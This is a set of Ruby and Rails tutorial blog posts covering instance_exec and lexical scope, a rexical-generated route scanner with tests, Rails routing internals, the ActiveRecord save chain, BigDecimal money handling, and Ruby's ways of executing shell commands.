Understanding instance exec in ruby

In ruby procs have lexical scoping. What does that even mean. Let’s start with a simple example.

square = lambda { x * x }
x = 20
puts square.call()
# => undefined local variable or method `x' for main:Object (NameError)

So even though variable x is present, the proc could not find it because when the code was read then x was missing .

Let’s fix the code.

x = 2
square = lambda { x * x }
x = 20
puts square.call()
# => 400

In the above case we got the answer. But the answer is 400 instead of 4 . That is because the proc binding refers to the variable x. The binding does not hold the value of the variable, it just holds the list of variables available. In this case the value of x happens to be 20 when the code was executed and the result is 400 .

x does not have to a variable. It could be a method. Check this out.

square = lambda { x * x }
def x
  20
end
puts square.call()
# => 400

In the above case x is a method definition. Notice that binding is smart enough to figure out that since no x variable is present let’s try and see if there is a method by name x .

Another example of lexical binding in procs

def square(p)
   x = 2
   puts p.call
end
x = 20
square(lambda { x * x })
#=> 400

In the above case the value of x is set as 20 at the code compile time. Don’t get fooled by x being 2 inside the method call. Inside the method call a new scope starts and the x inside the method is not the same x as outside .

Issues because of lexical scoping

Here is a simple case.

class Person
  code = proc { puts self }

  define_method :name do
    code.call()
  end
end

class Developer < Person
end

Person.new.name # => Person
Developer.new.name # => Person

In the above case when Developer.new.name is executed then output is Person. And that can cause problem. For example in Ruby on Rails at a number of places self is used to determine if the model that is being acted upon is STI or not. If the model is STI then for Developer the query will have an extra where clause like AND "people"."type" IN ('Developer') . So we need to find a solution so that self reports correctly for both Person and ‘Developer` .

instance_eval can change self

instance_eval can be used to change self. Here is refactored code using instance_eval .

class Person
  code = proc { puts self }

  define_method :name do
    self.class.instance_eval &code
  end
end

class Developer < Person
end

Person.new.name #=> Person
Developer.new.name #=> Developer

Above code produces right result. However instance_eval has one limitation. It does not accept arguments. Let’s change the proc to accept some arguments to test this theory out.

class Person
  code = proc { |greetings| puts greetings; puts self }

  define_method :name do
    self.class.instance_eval 'Good morning', &code
  end
end

class Developer < Person
end

Person.new.name
Developer.new.name

#=> wrong number of arguments (1 for 0) (ArgumentError)

In the above case we get an error. That’s because instance_eval does not accept arguments.

This is where instance_exec comes to rescue. It allows us to change self and it can also accept arguments.

instance_exec to rescue

Here is code refactored to use instance_exec .

class Person
  code = proc { |greetings| puts greetings; puts self }

  define_method :name do
    self.class.instance_exec 'Good morning', &code
  end
end

class Developer < Person
end

Person.new.name #=> Good morning Person
Developer.new.name #=> Good morning Developer

As you can see in the above code instance_exec reports correct self and the proc can also accept arguments .

Conclusion

I hope this article helps you understand why instance_exec is useful.

I scanned RubyOnRails source code and found around 26 usages of instance_exec . Look at the usage of instance_exec usage there to gain more understanding on this topic.

Rex, Rexical and Rails routing

Please read Journery into Rails routing to get a background on Rails routing discussion.

A new language

Let’s say that the route definition looks like this.

/page/:id(/:action)(.:format)

The task at hand is to develop a new programming language which will understand the rules of the route definitions. Since this language deals with routes let’s call this language Poutes . Well Pout sounds better so let’s roll with that.

It all begins with scanner

rexical is a gem which generates scanner generator. Notice that rexical is not a scanner itself. It will generate a scanner for the given rules. Let’s give it a try.

Create a folder called pout_language and in that folder create a file called pout_scanner.rex . Notice that the extension of the file is .rex .

class PoutScanner
end

Before we proceed any further, let’s compile to make sure it works.

$ gem install rexical
$ rex pout_scanner.rex -o pout_scanner.rb
$ ls
pout_scanner.rb pout_scanner.rex

While doing gem install do not do gem install rex . We are installing gem called rexical not rex .

Time to add rules

Now it’s time to add rules to our pout.rex file.

Let’s try to develop scanner which can detect difference between integers and strings .

class PoutScanner
rule
  \d+         { puts "Detected number" }
  [a-zA-Z]+   { puts "Detected string" }
end

Regenerate the scanner .

$ rex pout_scanner.rex -o pout_scanner.rb

Now let’s put the scanner to test . Let’s create pout.rb .

require './pout_scanner.rb'
class Pout
  @scanner = PoutScanner.new
  @scanner.tokenize("123")
end

You will get the error undefined method tokenize’ for # (NoMethodError)` .

To fix this error open pout_scanner.rex and add inner section like this .

class PoutScanner
rule
  \d+         { puts "Detected number" }
  [a-zA-Z]+   { puts "Detected string" }

inner
  def tokenize(code)
    scan_setup(code)
    tokens = []
    while token = next_token
      tokens << token
    end
    tokens
  end
end

Regenerate the scanner by executing rex pout_scanner.rex -o pout_scanner.rb . Now let’s try to run pout.rb file.

$ ruby pout.rb
Detected number

So this time we got some result.

Now let’s test for a string .

 require './pout_scanner.rb'

class Pout
  @scanner = PoutScanner.new
  @scanner.tokenize("hello")
end

$ ruby pout.rb
Detected string

So the scanner is rightly identifying string vs integer. We are going to add a lot more testing so let’s create a test file so that we do not have to keep changing the pout.rb file.

Tests and Rake file

This is our pout_test.rb file.

require 'test/unit'
require './pout_scanner'

class PoutTest  < Test::Unit::TestCase
  def setup
    @scanner = PoutScanner.new
  end

  def test_standalone_string
    assert_equal [[:STRING, 'hello']], @scanner.tokenize("hello")
  end
end

And this is our Rakefile file .

require 'rake'
require 'rake/testtask'

task :generate_scanner do
  `rex pout_scanner.rex -o pout_scanner.rb`
end

task :default => [:generate_scanner, :test_units]

desc "Run basic tests"
Rake::TestTask.new("test_units") { |t|
  t.pattern = '*_test.rb'
  t.verbose = true
  t.warning = true
}

Also let’s change the pout_scanner.rex file to return an array instead of puts statements . The array contains information about what type of element it is and the value .

class PoutScanner
rule
  \d+         { [:INTEGER, text.to_i] }
  [a-zA-Z]+   { [:STRING, text] }

inner
  def tokenize(code)
    scan_setup(code)
    tokens = []
    while token = next_token
      tokens << token
    end
    tokens
  end
end

With all this setup now all we need to do is write test and run rake .

Tests for integer

I added following test and it passed.

def test_standalone_integer
  assert_equal [[:INTEGER, 123]], @scanner.tokenize("123")
end

However following test failed .

def test_string_and_integer
  assert_equal [[:STRING, 'hello'], [:INTEGER, 123]], @scanner.tokenize("hello 123")
end

Test is failing with following message

  1) Error:
test_string_and_integer(PoutTest):
PoutScanner::ScanError: can not match: ' 123'

Notice that in the error message before 123 there is a space. So the scanner does not know how to handle space. Let’s fix that.

Here is the updated rule. We do not want any action to be taken when a space is detected. Now test is passing .

class PoutScanner
rule
  \s+
  \d+         { [:INTEGER, text.to_i] }
  [a-zA-Z]+   { [:STRING, text] }

inner
  def tokenize(code)
    scan_setup(code)
    tokens = []
    while token = next_token
      tokens << token
    end
    tokens
  end
end

Back to routing business

Now that we have some background on how scanning works let’s get back to business at hand. The task is to properly parse a routing statement like /page/:id(/:action)(.:format) .

Test for slash

The simplest route is one with / . Let’s write a test and then rule for it.

require 'test/unit'
require './pout_scanner'

class PoutTest  < Test::Unit::TestCase
  def setup
    @scanner = PoutScanner.new
  end

  def test_just_slash
    assert_equal [[:SLASH, '/']], @scanner.tokenize("/")
  end

end

And here is the .rex file .

class PoutScanner
rule
  \/         { [:SLASH, text] }

inner
  def tokenize(code)
    scan_setup(code)
    tokens = []
    while token = next_token
      tokens << token
    end
    tokens
  end
end

Test for /page

Here is the test for /page .

def test_slash_and_literal
  assert_equal [[:SLASH, '/'], [:LITERAL, 'page']] , @scanner.tokenize("/page")
end

And here is the rule that was added .

 [a-zA-Z]+  { [:LITERAL, text] }

Test for /:page

Here is test for /:page .

def test_slash_and_symbol
  assert_equal [[:SLASH, '/'], [:SYMBOL, ':page']] , @scanner.tokenize("/:page")
end

And here are the rules .

rule
  \/          { [:SLASH, text]   }
  \:[a-zA-Z]+ { [:SYMBOL, text]  }
  [a-zA-Z]+   { [:LITERAL, text] }

Test for /(:page)

Here is test for /(:page) .

def test_symbol_with_paran
  assert_equal  [[[:SLASH, '/'], [:LPAREN, '('],  [:SYMBOL, ':page'], [:RPAREN, ')']]] , @scanner.tokenize("/(:page)")
end

And here is the new rule

  \/\(\:[a-z]+\) { [ [:SLASH, '/'], [:LPAREN, '('], [:SYMBOL, text[2..-2]], [:RPAREN, ')']] }

We’ll stop here and will look at the final set of files

Final files

This is Rakefile .

require 'rake'
require 'rake/testtask'

task :generate_scanner do
  `rex pout_scanner.rex -o pout_scanner.rb`
end

task :default => [:generate_scanner, :test_units]

desc "Run basic tests"
Rake::TestTask.new("test_units") { |t|
  t.pattern = '*_test.rb'
  t.verbose = true
  t.warning = true
}

This is pout_scanner.rex .

class PoutScanner
rule
  \/\(\:[a-z]+\) { [ [:SLASH, '/'], [:LPAREN, '('], [:SYMBOL, text[2..-2]], [:RPAREN, ')']] }
  \/          { [:SLASH, text]   }
  \:[a-zA-Z]+ { [:SYMBOL, text]  }
  [a-zA-Z]+   { [:LITERAL, text] }

inner
  def tokenize(code)
    scan_setup(code)
    tokens = []
    while token = next_token
      tokens << token
    end
    tokens
  end
end

This is pout_test.rb .

require 'test/unit'
require './pout_scanner'

class PoutTest  < Test::Unit::TestCase
  def setup
    @scanner = PoutScanner.new
  end

  def test_just_slash
    assert_equal [[:SLASH, '/']] , @scanner.tokenize("/")
  end

  def test_slash_and_literal
    assert_equal [[:SLASH, '/'], [:LITERAL, 'page']] , @scanner.tokenize("/page")
  end

  def test_slash_and_symbol
    assert_equal [[:SLASH, '/'], [:SYMBOL, ':page']] , @scanner.tokenize("/:page")
  end

  def test_symbol_with_paran
    assert_equal  [[[:SLASH, '/'], [:LPAREN, '('],  [:SYMBOL, ':page'], [:RPAREN, ')']]] , @scanner.tokenize("/(:page)")
  end
end

How scanner works

Here we used rex to generate the scanner. Now take a look that the pout_scanner.rb . Here is that file . Please take a look at this file and study the code. It is only 91 lines of code.

If you look at the code it is clear that scanning is not that hard. You can hand roll it without using a tool like rex . And that’s exactly what Aaron Patternson did in Journey . He hand rolled the scanner .

Conclusion

In this blog we saw how to use rex to build the scanner to read our routing statements . In the next blog we’ll see how to parse the routing statement and how to find the matching routing statement for a given url .

Journey into Rails Routing -- an under the hood look at how routing works

Following code was tested with edge rails (rails4) .

When a Rails application boots then it reads the config/routes.rb file. In your routes you might have code like this

Rails4demo::Application.routes.draw do
  root 'users#index'
  resources :users
  get 'photos/:id' => 'photos#show', :defaults => { :format => 'jpg' }
  get '/logout' => 'sessions#destroy', :as => :logout
  get "/stories" => redirect("/photos")
end

In the above case there are five different routing statements. Rails needs to store all those routes in a manner such that later when url is ‘/photos/5’ then it should be able to find the right route statement that should handle the request.

In this article we are going to take a peek at how Rails handles the whole routing business.

Normalization in action

In order to compare various routing statements first all the routing statements need to be normalized to a standard format so that one can easily compare one route statement with another route statement.

Before we take a deep dive into how the normalization works lets first see some normalizations in action.

get call with defaults

Here we have following route

Rails4demo::Application.routes.draw do
  get 'photos/:id' => 'photos#show', :defaults => { :format => 'jpg' }
end

After the normalization process the above routing statement is transformed into five different variables. The values for all those five variables is shown below.

app: #<ActionDispatch::Routing::RouteSet::Dispatcher:0x007fd05e0cf7e8
           @defaults={:format=>"jpg", :controller=>"photos", :action=>"show"},
           @glob_param=nil,
           @controller_class_names=#<ThreadSafe::Cache:0x007fd05e0cf7c0
           @backend={},
           @default_proc=nil>>
conditions: {:path_info=>"/photos/:id(.:format)", :required_defaults=>[:controller, :action], :request_method=>["GET"]}
requirements: {}
defaults: {:format=>"jpg", :controller=>"photos", :action=>"show"}
as: nil
anchor: true

app is the application that will be executed if conditions are met. conditions are the conditions. Pay attention to :path_info in conditions. This is used by Rails to determine the right route statement. defaults are defaults and requirements are the constraints.

GET call with as

Here we have following route

Rails4demo::Application.routes.draw do
  get '/logout' => 'sessions#destroy', :as => :logout
end

After normalization above code gets following values

app: #<ActionDispatch::Routing::RouteSet::Dispatcher:0x007f8ded87e740
           @defaults={:controller=>"sessions", :action=>"destroy"},
           @glob_param=nil,
           @controller_class_names=#<ThreadSafe::Cache:0x007f8ded87e718 @backend={},
           @default_proc=nil>>
conditions: {:path_info=>"/logout(.:format)", :required_defaults=>[:controller, :action], :request_method=>["GET"]}
requirements: {}
defaults: {:controller=>"sessions", :action=>"destroy"}
as: "logout"
anchor: true

Notice that in the above case as is populate with logout .

root call

Here we have following route

Rails4demo::Application.routes.draw do
  root 'users#index'
end

After normalization above code gets following values

app: #<ActionDispatch::Routing::RouteSet::Dispatcher:0x007fe91507f278
           @defaults={:controller=>"users", :action=>"index"},
           @glob_param=nil,
           @controller_class_names=#<ThreadSafe::Cache:0x007fe91507f250 @backend={},
           @default_proc=nil>>
conditions: {:path_info=>"/", :required_defaults=>[:controller, :action], :request_method=>["GET"]}
requirements: {}
defaults: {:controller=>"users", :action=>"index"}
as: "root"
anchor: true

Notice that in the above case as is populated. And the path_info is / since this is the root url .

GET call with constraints

Here we have following route

Rails4demo::Application.routes.draw do
  #get 'pictures/:id' => 'pictures#show', :constraints => { :id => /[A-Z]\d{5}/ }
end

After normalization above code gets following values

app: #<ActionDispatch::Routing::RouteSet::Dispatcher:0x007f8158e052c8
           @defaults={:controller=>"pictures", :action=>"show"},
           @glob_param=nil,
           @controller_class_names=#<ThreadSafe::Cache:0x007f8158e05278 @backend={},
           @default_proc=nil>>
conditions: {:path_info=>"/pictures/:id(.:format)", :required_defaults=>[:controller, :action], :request_method=>["GET"]}
requirements: {:id=>/[A-Z]\d{5}/}
defaults: {:controller=>"pictures", :action=>"show"}
as: nil
anchor: true

Notice that in the above case requirements is populated with constraints mentioned in the route definition .

get with a redirect

Here we have following route

Rails4demo::Application.routes.draw do
  get "/stories" => redirect("/posts")
end

After normalization above code gets following values

app: redirect(301, /posts)
conditions: {:path_info=>"/stories(.:format)", :required_defaults=>[], :request_method=>["GET"]}
requirements: {}
defaults: {}
as: "stories"
anchor: true

Notice that in the above case app is a simple redirect .

Resources

Here we have following route

Rails4demo::Application.routes.draw do
  resources :users
end

After normalization above code gets following values

app: #<ActionDispatch::Routing::RouteSet::Dispatcher:0x007f9d41a315c0
           @defaults={:action=>"index", :controller=>"users"}, @glob_param=nil, @controller_class_names=#<ThreadSafe::Cache:0x007f9d41a31598 @backend={}, @default_proc=nil>>
conditions: {:path_info=>"/users(.:format)", :required_defaults=>[:action, :controller], :request_method=>["GET"]}
defaults: {:action=>"index", :controller=>"users"}
as: "users"

app: #<ActionDispatch::Routing::RouteSet::Dispatcher:0x007f9d41a4ef80
           @defaults={:action=>"create", :controller=>"users"}, @glob_param=nil, @controller_class_names=#<ThreadSafe::Cache:0x007f9d41a4ef58 @backend={}, @default_proc=nil>>
conditions: {:path_info=>"/users(.:format)", :required_defaults=>[:action, :controller], :request_method=>["POST"]}
defaults: {:action=>"create", :controller=>"users"}
as: nil

app: #<ActionDispatch::Routing::RouteSet::Dispatcher:0x007f9d41b63790
           @defaults={:action=>"new", :controller=>"users"}, @glob_param=nil, @controller_class_names=#<ThreadSafe::Cache:0x007f9d41b63768 @backend={}, @default_proc=nil>>
conditions: {:path_info=>"/users/new(.:format)", :required_defaults=>[:action, :controller], :request_method=>["GET"]}
defaults: {:action=>"new", :controller=>"users"}
as: "new_user"

app: #<ActionDispatch::Routing::RouteSet::Dispatcher:0x007f9d41a10550
           @defaults={:action=>"edit", :controller=>"users"}, @glob_param=nil, @controller_class_names=#<ThreadSafe::Cache:0x007f9d41a10528 @backend={}, @default_proc=nil>>
conditions: {:path_info=>"/users/:id/edit(.:format)", :required_defaults=>[:action, :controller], :request_method=>["GET"]}
defaults: {:action=>"edit", :controller=>"users"}
as: "edit_user"

app: #<ActionDispatch::Routing::RouteSet::Dispatcher:0x007f9d41f31818
           @defaults={:action=>"show", :controller=>"users"}, @glob_param=nil, @controller_class_names=#<ThreadSafe::Cache:0x007f9d41f317f0 @backend={}, @default_proc=nil>>
conditions: {:path_info=>"/users/:id(.:format)", :required_defaults=>[:action, :controller], :request_method=>["GET"]}
defaults: {:action=>"show", :controller=>"users"}
as: "user"

app: #<ActionDispatch::Routing::RouteSet::Dispatcher:0x007f9d44a9bb70
           @defaults={:action=>"update", :controller=>"users"}, @glob_param=nil, @controller_class_names=#<ThreadSafe::Cache:0x007f9d44a9bb48 @backend={}, @default_proc=nil>>
conditions: {:path_info=>"/users/:id(.:format)", :required_defaults=>[:action, :controller], :request_method=>["PATCH"]}
defaults: {:action=>"update", :controller=>"users"}
as: nil

app: #<ActionDispatch::Routing::RouteSet::Dispatcher:0x007f9d41b17480
           @defaults={:action=>"update", :controller=>"users"}, @glob_param=nil, @controller_class_names=#<ThreadSafe::Cache:0x007f9d41b17458 @backend={}, @default_proc=nil>>
conditions: {:path_info=>"/users/:id(.:format)", :required_defaults=>[:action, :controller], :request_method=>["PUT"]}
defaults: {:action=>"update", :controller=>"users"}
as: nil

app: #<ActionDispatch::Routing::RouteSet::Dispatcher:0x007f9d439ddf68
           @defaults={:action=>"destroy", :controller=>"users"}, @glob_param=nil, @controller_class_names=#<ThreadSafe::Cache:0x007f9d439ddf40 @backend={}, @default_proc=nil>>
conditions: {:path_info=>"/users/:id(.:format)", :required_defaults=>[:action, :controller], :request_method=>["DELETE"]}
defaults: {:action=>"destroy", :controller=>"users"}
as: nil

In this case I omitted requirements and anchor for brevity .

Notice that a single routing statement resources :users created eight normalized routing statements. It means that resources statement is basically a short cut for defining all those eight routing statements .

Resources with only

Here we have following route

Rails4demo::Application.routes.draw do
  resources :users, only: :new
end

After normalization above code gets following values

app: #<ActionDispatch::Routing::RouteSet::Dispatcher:0x007fdf55043e40
           @defaults={:action=>"new", :controller=>"users"}, @glob_param=nil, @controller_class_names=#<ThreadSafe::Cache:0x007fdf55043e18 @backend={}, @default_proc=nil>>
conditions: {:path_info=>"/users/new(.:format)", :required_defaults=>[:action, :controller], :request_method=>["GET"]}
defaults: {:action=>"new", :controller=>"users"}
as: "new_user"

Because of only keyword only one routing statement was produced in this case.

Mapper

In Rails ActionDispatch::Routing::Mapper class is responsible for normalizing all routing statements.

module ActionDispatch
  module Routing
    class Mapper
      include Base
      include HttpHelpers
      include Redirection
      include Scoping
      include Concerns
      include Resources
    end
  end
end

Now let’s look at what these included modules do

Base

module Base
  def root (options = {})
  end

  def match
  end

  def mount(app, options = {})
  end

As you can see Base handles root, match and mount calls.

HttpHelpers

module HttpHelpers
  def get(*args, &block)
  end

  def post(*args, &block)
  end

  def patch(*args, &block)
  end

  def put(*args, &block)
  end

  def delete(*args, &block)
  end
end

HttpHelpers handles get, post, patch, put and delete .

Scoping

module Scoping
  def scope(*args)
  end

  def namespace(path, options = {})
  end

  def constraints(constraints = {})
  end
end

Resources

module Resources
  def resource(*resources, &block)
  end

  def resources(*resources, &block)
  end

  def collection
  end

  def member
  end

  def shallow
  end
end

Let’s put all the routes together

So now let’s look at all the routes definition together.

Rails4demo::Application.routes.draw do
  root 'users#index'
  get 'photos/:id' => 'photos#show', :defaults => { :format => 'jpg' }
  get '/logout' => 'sessions#destroy', :as => :logout
  get 'pictures/:id' => 'pictures#show', :constraints => { :id => /[A-Z]\d{5}/ }
  get "/stories" => redirect("/posts")
  resources :users
end

Above routes definition produces following information. I am going to show info path info.

{ :path_info=>"/":path_info=>"/photos/:id(.:format)" }

{ :path_info=>"/logout(.:format)" }

{ :path_info=>"/pictures/:id(.:format) }

{ :path_info=>"/stories(.:format)" }

{ :path_info=>"/users(.:format), :request_method=>["GET"]}

{:path_info=>"/users(.:format)", :request_method=>["POST"]}

{:path_info=>"/users/new(.:format)", :request_method=>["GET"]}

{:path_info=>"/users/:id/edit(.:format)", :request_method=>["GET"]}

{:path_info=>"/users/:id(.:format)", :controller], :request_method=>["GET"]}

{:path_info=>"/users/:id(.:format)", :request_method=>["PATCH"]}

{:path_info=>"/users/:id(.:format)", :request_method=>["PUT"]}

{:path_info=>"/users/:id(.:format)", :request_method=>["DELETE"]}

How to find the matching route definition

So now that we have normalized the routing definitions the task at hand is to find the right route definition for the given url along with request_method.

For example if the requested page is /pictures/A12345 then the matching routing definition should be get 'pictures/:id' => 'pictures#show', :constraints => { :id => /[A-Z]\d{5}/ } .

In order to accomplish that I would do something like this.

I would convert all path info into a regular expression and I would push that regular expression in an array. So in this case I would have 12 regular expressions in the array and for the given url I would try to match one by one.

This strategy will work and this is how Rails worked all the way upto Rails 3.1 .

Aaron Patterson loves computer science

Aaron Patterson noticed that finding the best matching route definition for a given url is nothing else but pattern matching task. And computer science solved this problem much more elegantly and this happens to run faster also by building an AST and walking over it.

So he decided to make a mini language out of the route definitions . After all the route definitions , we write , follow certain rules.

And thus Journey was born.

In the next blog we will see how to write grammar rules for routing definitions , how to parse and then walk the ast to see the best match .

Life of save in ActiveRecord

Following code was tested with edge rails (rails4) .

In a RubyonRails application we save records often. It is one of the most used methods in ActiveRecord. In the blog we are going to take a look at the life cycle of save operation.

ActiveRecord::Base

A typical model looks like this.

class Article < ActiveRecord::Base
end

Now lets look at ActiveRecord::Base class in its entirety.

module ActiveRecord
  class Base
    extend ActiveModel::Naming

    extend ActiveSupport::Benchmarkable
    extend ActiveSupport::DescendantsTracker

    extend ConnectionHandling
    extend QueryCache::ClassMethods
    extend Querying
    extend Translation
    extend DynamicMatchers
    extend Explain

    include Persistence
    include ReadonlyAttributes
    include ModelSchema
    include Inheritance
    include Scoping
    include Sanitization
    include AttributeAssignment
    include ActiveModel::Conversion
    include Integration
    include Validations
    include CounterCache
    include Locking::Optimistic
    include Locking::Pessimistic
    include AttributeMethods
    include Callbacks
    include Timestamp
    include Associations
    include ActiveModel::SecurePassword
    include AutosaveAssociation
    include NestedAttributes
    include Aggregations
    include Transactions
    include Reflection
    include Serialization
    include Store
    include Core
  end

  ActiveSupport.run_load_hooks(:active_record, Base)
end

Base class extends and includes a lot of modules. Here we are going to look at the four modules that have method def save .

module ActiveRecord
  class Base
    ......................
    include Persistence
    .......................
    include Validations
    ........................
    include AttributeMethods
    ........................
    include Transactions
    ........................
  end
end

include Persistence

Module Persistence defines save method like this

def save(*)
  create_or_update
rescue ActiveRecord::RecordInvalid
  false
end

Now lets see method create_or_update .

def create_or_update
  raise ReadOnlyRecord if readonly?
  result = new_record? ? create_record : update_record
  result != false
end

So save method invokes create_or_update and create_or_update method either creates a record or updates a record. Dead simple.

include Validations

In module Validations the save method is defined as

def save(options={})
  perform_validations(options) ? super : false
end

In this case the save method simply invokes a call to perform_validations .

include AttributeMethods

Module AttributeMethods includes a bunch of modules like this

module ActiveRecord
  module AttributeMethods
    extend ActiveSupport::Concern
    include ActiveModel::AttributeMethods

    included do
      include Read
      include Write
      include BeforeTypeCast
      include Query
      include PrimaryKey
      include TimeZoneConversion
      include Dirty
      include Serialization
    end

Here we want to look at Dirty module which has save method defined as following.

def save(*)
  if status = super
    @previously_changed = changes
    @changed_attributes.clear
  end
  status
end

Since this module is all about tracking if a record is dirty or not, the save method tracks the changed values.

include Transactions

In module Transactions the save method is defined as

def save(*) #:nodoc:
  rollback_active_record_state! do
    with_transaction_returning_status { super }
  end
end

The method rollback_active_record_state! is defined as

def rollback_active_record_state!
  remember_transaction_record_state
  yield
rescue Exception
  restore_transaction_record_state
  raise
ensure
  clear_transaction_record_state
end

And the method with_transaction_returning_status is defined as

def with_transaction_returning_status
  status = nil
  self.class.transaction do
    add_to_transaction
    begin
      status = yield
    rescue ActiveRecord::Rollback
      @_start_transaction_state[:level] = (@_start_transaction_state[:level] || 0) - 1
      status = nil
    end

    raise ActiveRecord::Rollback unless status
  end
  status
end

Together methods rollback_active_record_state! and with_transaction_returning_status ensure that all the operations happening inside save is happening in a single transaction.

Why save method needs to be in a transaction .

A model can define a number of callbacks including after_save and before_save. All those callbacks are operated within a transaction. It means if an after_save callback operation raises an exception then the save operation is rolled back.

Not only that a number of associations like has_many and belongs_to use callbacks to handle association manipulation. In order to ensure the integrity of the operation the save operation is wrapped in a transaction .

reverse order of operation

In the Base class the modules are included in the following order.

module ActiveRecord
  class Base
    ......................
    include Persistence
    .......................
    include Validations
    ........................
    include AttributeMethods
    ........................
    include Transactions
    ........................
  end
end

All the four modules have save method. The way ruby works the last module to be included gets to act of the method first. So the order in which save method gets execute is Transactions, AttributeMethods, Validations and Persistence .

To get a visual feel, I added a puts inside each of the save methods. Here is the result.

> User.new.save
1.9.1 :001 > User.new.save
entering save in transactions
   (0.1ms)  begin transaction
entering save in attribute_methods
entering save in validations
entering save in persistence
  SQL (47.3ms)  INSERT INTO "users" ("created_at", "updated_at") VALUES (?, ?)  [["created_at", Mon, 21 Jan 2013 14:56:52 UTC +00:00], ["updated_at", Mon, 21 Jan 2013 14:56:52 UTC +00:00]]
leaving save in persistence
leaving save in validations
leaving save in attribute_methods
   (17.6ms)  rollback transaction
leaving save in transactions
 => nil

As you can see the order of operations is

entering save in transactions
entering save in attribute_methods
entering save in validations
entering save in persistence

leaving save in persistence
leaving save in validations
leaving save in attribute_methods
leaving save in transactions

Handling money in ruby

In ruby do not use float for calculation since float is not good for precise calculation.

irb(main):001:0> 200 * (7.0/100)
=> 14.000000000000002

7 % of 200 should be 14. But float is returning 14.000000000000002 .

In order to ensure that calculation is right make sure that all the actors participating in calculation is of class BigDecimal . Here is how same operation can be performed using BigDecimal .

irb(main):003:0> result = BigDecimal.new(200) * ( BigDecimal.new(7)/BigDecimal.new(100))
=> #<BigDecimal:7fa5eefa1720,'0.14E2',9(36)>
irb(main):004:0> result.to_s
=> "14.0"

As we can see BigDecimal brings much more accurate result.

Converting money to cents

In order to charge the credit card using Stripe we needed to have the amount to be charged in cents. One way to convert the value in cents would be

amount  = BigDecimal.new(200) * ( BigDecimal.new(7)/BigDecimal.new(100))
puts (amount * 100).to_i #=> 1400

Above method works but I like to delegate the functionality of making money out of a complex BigDecimal value to gem like money . In this project we are using activemerchant which depends on money gem . So we get money gem for free. You might have to add money gem to Gemfile if you want to use following technique.

money gem lets you get a money instance out of BigDecimal.

amount  = BigDecimal.new(200) * ( BigDecimal.new(7)/BigDecimal.new(100))
amount_in_money = amount.to_money
puts amount_in_money.cents #=> 1400

Stay in BigDecimal or money mode for calculation

If you are doing any sort of calculation then all participating elements must be either BigDecimal or Money instance. It is best if all the elements are of the same type.

Executing commands in ruby

Ruby allows many different ways to execute a command or a sub-process. In this article we are going to see some of them.

backtick

1. Returns standard output

backtick returns the standard output of the operation.

output = `ls`
puts "output is #{output}"

Result of above code is

$ ruby main.rb
output is lab.rb
main.rb

2. Exception is passed on to the master program

Backtick operation forks the master process and the operation is executed in a new process. If there is an exception in the sub-process then that exception is given to the main process and the main process might terminate if exception is not handled.

In the following case I am executing xxxxx which is not a valid executable name.

output = `xxxxxxx`
puts "output is #{output}"

Result of above code is given below. Notice that puts was never executed because the backtick operation raised exception.

$ ruby main.rb
main.rb:1:in ``': No such file or directory - xxxxxxx (Errno::ENOENT)
	from main.rb:1:in `<main>'

3. Blocking operation

Backtick is a blocking operation. The main application waits until the result of backtick operation completes.

4. Checking the status of the operation

To check the status of the backtick operation you can execute $?.success?

output = `ls`
puts "output is #{output}"
puts $?.success?

Notice that the last line of the result contains true because the backtick operation was a success.

$ ruby main.rb
output is lab.rb
main.rb
true

backtick returns STDOUT. backtick does not capture STDERR . If you want to learn about STDERR then checkout this excellent article .

You can redirect STDERR to STDOUT if you want to capture STDERR using backtick.

output = `grep hosts /private/etc/* 2>&1`

5. String interpolation is allowed within the ticks

cmd = 'ls'
`#{cmd}`

6. Different delimiter and string interpolation

%x does the same thing as backtick. It allows you to have different delimeter.

output = %x[ ls ]
output = %x{ ls }

backtick runs the command via shell. So shell features like string interpolation and wild card can be used. Here is an example.

$ irb
> dir = '/etc'
> %x<ls -al #{dir}>
=> "lrwxr-xr-x@ 1 root  wheel  11 Jan  5 21:10 /etc -> private/etc"

system

system behaves a bit like backtick operation. However there are some differences.

First let’s look at similarities.

1. Blocking operation

Just like backtick, system is a blocking operation.

2. Eats up all exceptions

system eats up all the exceptions. So the main operation never needs to worry about capturing an exception raised from the child process.

output = system('xxxxxxx')
puts "output is #{output}"

Result of the above operation is given below. Notice that even when exception is raised the main program completes and the output is printed. The value of output is nil because the child process raised an exception.

$ ruby main.rb
output is

3. Checking the status of the operation

system returns true if the command was successfully performed ( exit status zero ) . It returns false for non zero exit status. It returns nil if command execution fails.

system("command that does not exist")  #=> nil
system("ls")                           #=> true
system("ls | grep foo")                #=> false

exec

exec replaces the current process by running the external command. Let’s see an example.

Here I am in irb and I am going to execute exec('ls').

$ irb
e1.9.3-p194 :001 > exec('ls')
lab.rb  main.rb

nsingh ~/dev/lab 1.9.3
$

I see the result but since the irb process was replaced by the exec process I am no longer in irb .

Behind the scene both system and backtick operations use fork to fork the current process and then they execute the given operation using exec .

Since exec replaces the current process it does not return anything if the operation is a success. If the operation fails then `SystemCallError</e> is raised.

sh

sh actually calls system under the hood. However it is worth a mention here. This method is added by FileUtils in rake. It allows an easy way to check the exit status of the command.

require 'rake'
sh %w(xxxxx) do |ok, res|
   if !ok
     abort 'the operation failed'
   end
end

popen3

If you are going to capture stdout and stderr then you should use popen3 since this method allows you to interact with stdin, stdout and stderr .

I want to execute git push heroku master programmatically and I want to capture the output. Here is my code.

require 'open3'
cmd = 'git push heroku master'
Open3.popen3(cmd) do |stdin, stdout, stderr, wait_thr|
  puts "stdout is:" + stdout.read
  puts "stderr is:" + stderr.read
end

And here is the output. It has been truncated since rest of output is not relevant to this discussion.

stdout is:
stderr is:
-----> Heroku receiving push
-----> Ruby/Rails app detected
-----> Installing dependencies using Bundler version 1.2.1

The important thing to note here is that when I execute the program ruby lab.rb I do not see any output on my terminal for first 10 seconds. Then I see the whole output as one single dump.

The other thing to note is that heroku is writing all this output to stderr and not to stdout .

Above solution works but it has one major drawback. The push to heroku might take 10 to 20 seconds and for this period we do not get any feedback on the terminal. In reality when we execute git push heroku master we start seeing result on our terminal one by one as heroku is processing things.

So we should capture the output from heroku as it is being streamed rather than dumping the whole output as one single chunk of string at the end of processing.

Here is the modified code.

require 'open3'
cmd = 'git push heroku master'
Open3.popen3(cmd) do |stdin, stdout, stderr, wait_thr|
  while line = stderr.gets
    puts line
  end
end

Now when I execute above command using ruby lab.rb I get the output on my terminal incrementally as if I had typed git push heroku master .

Here is another example of capturing streaming output.

require 'open3'
cmd = 'ping www.google.com'
Open3.popen3(cmd) do |stdin, stdout, stderr, wait_thr|
  while line = stdout.gets
    puts line
  end
end

